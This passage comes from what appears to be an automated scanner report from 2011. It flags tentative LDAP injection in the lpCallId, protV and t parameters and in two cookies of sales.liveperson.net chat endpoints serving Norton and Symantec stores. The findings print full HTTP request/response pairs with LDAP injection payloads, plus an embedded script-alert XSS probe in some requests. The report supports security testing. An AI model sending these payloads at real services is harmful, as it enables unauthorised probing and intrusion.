Last-Modified: Fri, 09 Sep 2011 21:37:50 GMT
Set-Cookie: HumanClickSiteContainerID_2735064=STANDALONE; path=/hc/2735064
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 427

lpConnLib.Process({"ResultSet": {"lpCallId":"243824564852-218836609740","lpCallConfirm":"","lpJS_Execute":[{"code_id": "SET-REJECT", "js_code": "lpMTag.lpVisitorStatus = 'REJECT_STATUS';"},{"code_id": "INVITE-TIMEOUT", "js_code": "var cParam=lpMTag.lpSetCallParams('mTagInPage');if(lpMTag.mtagAddToQueue){lpMTag.mtagAddToQueue(lpMTag.lpURL,cParam,null,false);}else{lpConnLib.addToQueue(lpMTag.lpURL,cParam,null,false);};"}]}});

1.6. http://sales.liveperson.net/hc/2735064/ [lpCallId parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://sales.liveperson.net
Path:	/hc/2735064/

Issue detail

The lpCallId parameter appears to be vulnerable to LDAP injection attacks.

The payloads 93a3bb2cb00a26ff)(sn=* and 93a3bb2cb00a26ff)!(sn=* were each submitted in the lpCallId parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /hc/2735064/?&site=2735064&cmd=mTagStartPage&lpCallId=93a3bb2cb00a26ff)(sn=*&protV=20&lpjson=1&page=http%3A//buy.norton.com/estore/mf/landingProductFeatures%3Frdid%3D572380a9-b4aa-41b0-afd3-f2edfaa197211315603876508&id=2707016684&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-norton-estore-us-english&activePlugin=none&cobrowse=true&PV%21unit=norton-estore-us&PV%21iproducts=na&PV%21offered_sku_desc_int=na&PV%21pagename=store%3Aus%3Ahho%20mf%3Ahomepage%3Ahomepage&PV%21ucproduct=na&PV%21offered_sku_desc=na&PV%21billingerror=false&PV%21pageLoadTime=1%20sec&PV%21visitorActive=1&SV%21language=english&SV%21traffic_source=store%3Atrf_id%3Asymcom&SV%21current_subchannel=store%3Aonline%20%281st%29&SV%21language=en&SV%21site_id=store%3Aus&SV%21country=us&SV%21incoming_productSKU=&SV%21session_guid=359A5BC1-187B-E37B-9025-A486DEF7EF50&SV%21partner=store%3Asymantec&title=Norton%20Security%20-%20Antivirus%20Software%20%7C%20Norton%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&cobrowse=true HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://buy.norton.com/estore/mf/landingProductFeatures?rdid=572380a9-b4aa-41b0-afd3-f2edfaa197211315603876508
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=8455684308930202655; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603881647

Response 1

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:33:31 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 09 Sep 2011 21:33:31 GMT
Set-Cookie: HumanClickSiteContainerID_2735064=STANDALONE; path=/hc/2735064
Set-Cookie: LivePersonID=-5110247826455-1315603892:-1:-1:-1:-1; expires=Sat, 08-Sep-2012 21:33:31 GMT; path=/hc/2735064; domain=.liveperson.net
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 84

lpConnLib.Process({"ResultSet": {"lpCallId":"","lpCallError":"REQUEST_NOT_VALID"}});

Request 2

GET /hc/2735064/?&site=2735064&cmd=mTagStartPage&lpCallId=93a3bb2cb00a26ff)!(sn=*&protV=20&lpjson=1&page=http%3A//buy.norton.com/estore/mf/landingProductFeatures%3Frdid%3D572380a9-b4aa-41b0-afd3-f2edfaa197211315603876508&id=2707016684&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-norton-estore-us-english&activePlugin=none&cobrowse=true&PV%21unit=norton-estore-us&PV%21iproducts=na&PV%21offered_sku_desc_int=na&PV%21pagename=store%3Aus%3Ahho%20mf%3Ahomepage%3Ahomepage&PV%21ucproduct=na&PV%21offered_sku_desc=na&PV%21billingerror=false&PV%21pageLoadTime=1%20sec&PV%21visitorActive=1&SV%21language=english&SV%21traffic_source=store%3Atrf_id%3Asymcom&SV%21current_subchannel=store%3Aonline%20%281st%29&SV%21language=en&SV%21site_id=store%3Aus&SV%21country=us&SV%21incoming_productSKU=&SV%21session_guid=359A5BC1-187B-E37B-9025-A486DEF7EF50&SV%21partner=store%3Asymantec&title=Norton%20Security%20-%20Antivirus%20Software%20%7C%20Norton%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&cobrowse=true HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://buy.norton.com/estore/mf/landingProductFeatures?rdid=572380a9-b4aa-41b0-afd3-f2edfaa197211315603876508
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=8455684308930202655; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603881647

Response 2

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:33:32 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 09 Sep 2011 21:33:32 GMT
Set-Cookie: HumanClickSiteContainerID_2735064=STANDALONE; path=/hc/2735064
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 84

lpConnLib.Process({"ResultSet": {"lpCallId":"","lpCallError":"REQUEST_NOT_VALID"}});

1.7. http://sales.liveperson.net/hc/71097838/ [HumanClickACTIVE cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://sales.liveperson.net
Path:	/hc/71097838/

Issue detail

The HumanClickACTIVE cookie appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the HumanClickACTIVE cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /hc/71097838/?&site=71097838&cmd=mTagInviteShown&lpCallId=466950613539-178177123656&protV=20&lpjson=1&page=http%3A//www.symantec.com/store/products/index.jsp%3Finid%3Dus_pagenotfound_smb_store&id=9383966153&javaSupport=true&visitorStatus=ENGAGE_STATUS&defInvite=chat-store-business-english&activePlugin=none&cobrowse=true&title=Store%20Shop%20Products%20-%20Symantec%20Corp.&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&channel=web&t=1 HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/store/products/index.jsp?inid=us_pagenotfound_smb_store
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=1932846460867730791; LivePersonID=-5110247826455-1315603877:-1:1315603882:-1:-1; HumanClickSiteContainerID_71097838=Master; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=*)(sn=*

Response 1

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:34:47 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 09 Sep 2011 21:34:47 GMT
Set-Cookie: HumanClickSiteContainerID_71097838=Master; path=/hc/71097838
Set-Cookie: LivePersonID=-5110247826455-1315603877:-1:1315603882:-1:-1; expires=Sat, 08-Sep-2012 21:34:47 GMT; path=/hc/71097838; domain=.liveperson.net
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 343

lpConnLib.Process({"ResultSet": {"lpCallId":"466950613539-178177123656","lpCallConfirm":"","lpJS_Execute":[{"code_id": "INVITE-SHOWN", "js_code": "var cParam=lpMTag.lpSetCallParams('mTagInPage');if(lpMTag.mtagAddToQueue){lpMTag.mtagAddToQueue(lpMTag.lpURL,cParam,null,false);}else{lpConnLib.addToQueue(lpMTag.lpURL,cParam,null,false);};"}]}});

Request 2

Response 2

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:34:49 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 09 Sep 2011 21:34:49 GMT
Set-Cookie: HumanClickSiteContainerID_71097838=Master; path=/hc/71097838
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 343

lpConnLib.Process({"ResultSet": {"lpCallId":"466950613539-178177123656","lpCallConfirm":"","lpJS_Execute":[{"code_id": "INVITE-SHOWN", "js_code": "var cParam=lpMTag.lpSetCallParams('mTagInPage');if(lpMTag.mtagAddToQueue){lpMTag.mtagAddToQueue(lpMTag.lpURL,cParam,null,false);}else{lpConnLib.addToQueue(lpMTag.lpURL,cParam,null,false);};"}]}});

1.8. http://sales.liveperson.net/hc/71097838/ [HumanClickSiteContainerID_71097838 cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://sales.liveperson.net
Path:	/hc/71097838/

Issue detail

The HumanClickSiteContainerID_71097838 cookie appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the HumanClickSiteContainerID_71097838 cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /hc/71097838/?&site=71097838&cmd=mTagInPage&lpCallId=465838986914-760230379877&protV=20&lpjson=1&page=http%3A//store.symantec.com/%3Finid%3Dus_pagenotfound_smb_store&id=4734450057&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-store-business-english&activePlugin=none&cobrowse=true HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://store.symantec.com/?inid=us_pagenotfound_smb_store
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=1932846460867730791; LivePersonID=-5110247826455-1315603877:-1:-1:-1:-1; HumanClickSiteContainerID_71097838=*)(sn=*; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603879317

Response 1

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:33:40 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_71097838=Master; path=/hc/71097838
Set-Cookie: LivePersonID=-5110247826455-1315603877:-1:1315603882:-1:-1; expires=Sat, 08-Sep-2012 21:33:40 GMT; path=/hc/71097838; domain=.liveperson.net
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 09 Sep 2011 21:33:40 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 188

lpConnLib.Process({"ResultSet": {"lpCallId":"465838986914-760230379877","lpCallConfirm":"","lpJS_Execute":[{"code_id": "INPAGE-DELAY-10", "js_code": "lpMTag.lpInPageRequestDelay=10;"}]}});

Request 2

GET /hc/71097838/?&site=71097838&cmd=mTagInPage&lpCallId=465838986914-760230379877&protV=20&lpjson=1&page=http%3A//store.symantec.com/%3Finid%3Dus_pagenotfound_smb_store&id=4734450057&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-store-business-english&activePlugin=none&cobrowse=true HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://store.symantec.com/?inid=us_pagenotfound_smb_store
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=1932846460867730791; LivePersonID=-5110247826455-1315603877:-1:-1:-1:-1; HumanClickSiteContainerID_71097838=*)!(sn=*; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603879317

Response 2

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:33:41 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_71097838=Master; path=/hc/71097838
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 09 Sep 2011 21:33:41 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 188

lpConnLib.Process({"ResultSet": {"lpCallId":"465838986914-760230379877","lpCallConfirm":"","lpJS_Execute":[{"code_id": "INPAGE-DELAY-10", "js_code": "lpMTag.lpInPageRequestDelay=10;"}]}});

1.9. http://sales.liveperson.net/hc/71097838/ [lpCallId parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://sales.liveperson.net
Path:	/hc/71097838/

Issue detail

The lpCallId parameter appears to be vulnerable to LDAP injection attacks.

The payloads 92b3a3f88ff05d96)(sn=* and 92b3a3f88ff05d96)!(sn=* were each submitted in the lpCallId parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /hc/71097838/?&site=71097838&cmd=mTagStartPage&lpCallId=92b3a3f88ff05d96)(sn=*&protV=20&lpjson=1&page=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps6ed59%2522%253E%253Cscript%253Ealert%28document.location%29%253C/script%253E0e8182bf4be&id=9609075416&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-sales-business-english&activePlugin=none&cobrowse=true&PV%21unit=sales-business&PV%21Section=Products&PV%21BusinessPageCategory=Overview&PV%21ProductFamily=Information%20Risk%20%26%20Compliance&PV%21ProductName=VeriSign%20Identity%20Protection%20Fraud%20Detection%20Service&PV%21ProductId=fds&PV%21pageLoadTime=2%20sec&PV%21visitorActive=1&SV%21language=english&SV%21MarketTier=&title=Risk-Based%20Authentication%2C%20Fraud%20Detection%2C%20Identity%20Theft%20Protection%20-%20VeriSign%20Identity%20Protection%20Fraud%20Detection%20Service&referrer=http%3A//burp/show/2&cookie=s_vi%3D%5BCS%5Dv1%7C2735422985161DC5-600001A3801B01DD%5BCE%5D%3B%20IS3_History%3D0-0-0____%3B%20IS3_GSV%3DDPL-0_TES-1315621927_PCT-1315621927_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-%3B%20s_sq%3D%255B%255BB%255D%255D%3B%20s_pers%3D%2520s_nr%253D1315621972496-New%257C1336357972496%253B%2520event69%253Devent69%257C1336357972499%253B%3B%20s_sess%3D%2520s_sv_sid%253D806960442771%253B%2520s_cc%253Dtrue%253B%2520s_sq%253D%253B%3B%20s_sv_112_s1%3D1@16@a//1315621570007%3B%20s_sv_112_p1%3D1@25@s/6036/5742/5736/5417%26e/9 HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps6ed59%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E0e8182bf4be
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=1932846460867730791; LivePersonID=-5110247826455-1315603877:-1:1315603882:-1:-1; HumanClickSiteContainerID_71097838=Master; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603944147

Response 1

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:34:23 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 09 Sep 2011 21:34:23 GMT
Set-Cookie: HumanClickSiteContainerID_71097838=Secondary1; path=/hc/71097838
Set-Cookie: LivePersonID=-5110247826455-1315604062:-1:1315604022:-1:-1; expires=Sat, 08-Sep-2012 21:34:23 GMT; path=/hc/71097838; domain=.liveperson.net
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 84

lpConnLib.Process({"ResultSet": {"lpCallId":"","lpCallError":"REQUEST_NOT_VALID"}});

Request 2

GET /hc/71097838/?&site=71097838&cmd=mTagStartPage&lpCallId=92b3a3f88ff05d96)!(sn=*&protV=20&lpjson=1&page=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps6ed59%2522%253E%253Cscript%253Ealert%28document.location%29%253C/script%253E0e8182bf4be&id=9609075416&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-sales-business-english&activePlugin=none&cobrowse=true&PV%21unit=sales-business&PV%21Section=Products&PV%21BusinessPageCategory=Overview&PV%21ProductFamily=Information%20Risk%20%26%20Compliance&PV%21ProductName=VeriSign%20Identity%20Protection%20Fraud%20Detection%20Service&PV%21ProductId=fds&PV%21pageLoadTime=2%20sec&PV%21visitorActive=1&SV%21language=english&SV%21MarketTier=&title=Risk-Based%20Authentication%2C%20Fraud%20Detection%2C%20Identity%20Theft%20Protection%20-%20VeriSign%20Identity%20Protection%20Fraud%20Detection%20Service&referrer=http%3A//burp/show/2&cookie=s_vi%3D%5BCS%5Dv1%7C2735422985161DC5-600001A3801B01DD%5BCE%5D%3B%20IS3_History%3D0-0-0____%3B%20IS3_GSV%3DDPL-0_TES-1315621927_PCT-1315621927_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-%3B%20s_sq%3D%255B%255BB%255D%255D%3B%20s_pers%3D%2520s_nr%253D1315621972496-New%257C1336357972496%253B%2520event69%253Devent69%257C1336357972499%253B%3B%20s_sess%3D%2520s_sv_sid%253D806960442771%253B%2520s_cc%253Dtrue%253B%2520s_sq%253D%253B%3B%20s_sv_112_s1%3D1@16@a//1315621570007%3B%20s_sv_112_p1%3D1@25@s/6036/5742/5736/5417%26e/9 HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps6ed59%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E0e8182bf4be
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=1932846460867730791; LivePersonID=-5110247826455-1315603877:-1:1315603882:-1:-1; HumanClickSiteContainerID_71097838=Master; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603944147

Response 2

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:34:24 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 09 Sep 2011 21:34:24 GMT
Set-Cookie: HumanClickSiteContainerID_71097838=Secondary1; path=/hc/71097838
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 84

lpConnLib.Process({"ResultSet": {"lpCallId":"","lpCallError":"REQUEST_NOT_VALID"}});

1.10. http://sales.liveperson.net/hc/71097838/ [protV parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://sales.liveperson.net
Path:	/hc/71097838/

Issue detail

The protV parameter appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the protV parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /hc/71097838/?&site=71097838&cmd=mTagInviteTimeout&lpCallId=466464716009-798532190732&protV=*)(sn=*&lpjson=1&page=http%3A//store.symantec.com/%3Finid%3Dus_pagenotfound_smb_store&id=4734450057&javaSupport=true&visitorStatus=ENGAGE_STATUS&defInvite=chat-store-business-english&activePlugin=none&cobrowse=true&title=Buy%20Symantec%20Business%20Products%20-%20Shop%20Small%20Business%20%7C%20Symantec%20Business%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&timeout=120&channel=web&t=1 HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://store.symantec.com/?inid=us_pagenotfound_smb_store
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=1932846460867730791; LivePersonID=-5110247826455-1315603877:-1:1315603882:-1:-1; HumanClickSiteContainerID_71097838=Master; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603944147

Response 1

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:35:23 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 09 Sep 2011 21:35:23 GMT
Set-Cookie: HumanClickSiteContainerID_71097838=Master; path=/hc/71097838
Set-Cookie: LivePersonID=-5110247826455-1315604120:-1:1315604070:-1:-1; expires=Sat, 08-Sep-2012 21:35:23 GMT; path=/hc/71097838; domain=.liveperson.net
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 427

lpConnLib.Process({"ResultSet": {"lpCallId":"466464716009-798532190732","lpCallConfirm":"","lpJS_Execute":[{"code_id": "SET-REJECT", "js_code": "lpMTag.lpVisitorStatus = 'REJECT_STATUS';"},{"code_id": "INVITE-TIMEOUT", "js_code": "var cParam=lpMTag.lpSetCallParams('mTagInPage');if(lpMTag.mtagAddToQueue){lpMTag.mtagAddToQueue(lpMTag.lpURL,cParam,null,false);}else{lpConnLib.addToQueue(lpMTag.lpURL,cParam,null,false);};"}]}});

Request 2

GET /hc/71097838/?&site=71097838&cmd=mTagInviteTimeout&lpCallId=466464716009-798532190732&protV=*)!(sn=*&lpjson=1&page=http%3A//store.symantec.com/%3Finid%3Dus_pagenotfound_smb_store&id=4734450057&javaSupport=true&visitorStatus=ENGAGE_STATUS&defInvite=chat-store-business-english&activePlugin=none&cobrowse=true&title=Buy%20Symantec%20Business%20Products%20-%20Shop%20Small%20Business%20%7C%20Symantec%20Business%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&timeout=120&channel=web&t=1 HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://store.symantec.com/?inid=us_pagenotfound_smb_store
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=1932846460867730791; LivePersonID=-5110247826455-1315603877:-1:1315603882:-1:-1; HumanClickSiteContainerID_71097838=Master; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603944147

Response 2

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:35:24 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 09 Sep 2011 21:35:24 GMT
Set-Cookie: HumanClickSiteContainerID_71097838=Master; path=/hc/71097838
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 427

lpConnLib.Process({"ResultSet": {"lpCallId":"466464716009-798532190732","lpCallConfirm":"","lpJS_Execute":[{"code_id": "SET-REJECT", "js_code": "lpMTag.lpVisitorStatus = 'REJECT_STATUS';"},{"code_id": "INVITE-TIMEOUT", "js_code": "var cParam=lpMTag.lpSetCallParams('mTagInPage');if(lpMTag.mtagAddToQueue){lpMTag.mtagAddToQueue(lpMTag.lpURL,cParam,null,false);}else{lpConnLib.addToQueue(lpMTag.lpURL,cParam,null,false);};"}]}});

1.11. http://sales.liveperson.net/hc/71097838/ [t parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://sales.liveperson.net
Path:	/hc/71097838/

Issue detail

The t parameter appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the t parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /hc/71097838/?&site=71097838&cmd=mTagInviteTimeout&lpCallId=466464716009-798532190732&protV=20&lpjson=1&page=http%3A//store.symantec.com/%3Finid%3Dus_pagenotfound_smb_store&id=4734450057&javaSupport=true&visitorStatus=ENGAGE_STATUS&defInvite=chat-store-business-english&activePlugin=none&cobrowse=true&title=Buy%20Symantec%20Business%20Products%20-%20Shop%20Small%20Business%20%7C%20Symantec%20Business%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&timeout=120&channel=web&t=*)(sn=* HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://store.symantec.com/?inid=us_pagenotfound_smb_store
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=1932846460867730791; LivePersonID=-5110247826455-1315603877:-1:1315603882:-1:-1; HumanClickSiteContainerID_71097838=Master; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603944147

Response 1

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:36:35 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 09 Sep 2011 21:36:35 GMT
Set-Cookie: HumanClickSiteContainerID_71097838=Master; path=/hc/71097838
Set-Cookie: LivePersonID=-5110247826455-1315603877:-1:1315603882:-1:-1; expires=Sat, 08-Sep-2012 21:36:35 GMT; path=/hc/71097838; domain=.liveperson.net
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 427

lpConnLib.Process({"ResultSet": {"lpCallId":"466464716009-798532190732","lpCallConfirm":"","lpJS_Execute":[{"code_id": "SET-REJECT", "js_code": "lpMTag.lpVisitorStatus = 'REJECT_STATUS';"},{"code_id": "INVITE-TIMEOUT", "js_code": "var cParam=lpMTag.lpSetCallParams('mTagInPage');if(lpMTag.mtagAddToQueue){lpMTag.mtagAddToQueue(lpMTag.lpURL,cParam,null,false);}else{lpConnLib.addToQueue(lpMTag.lpURL,cParam,null,false);};"}]}});

Request 2

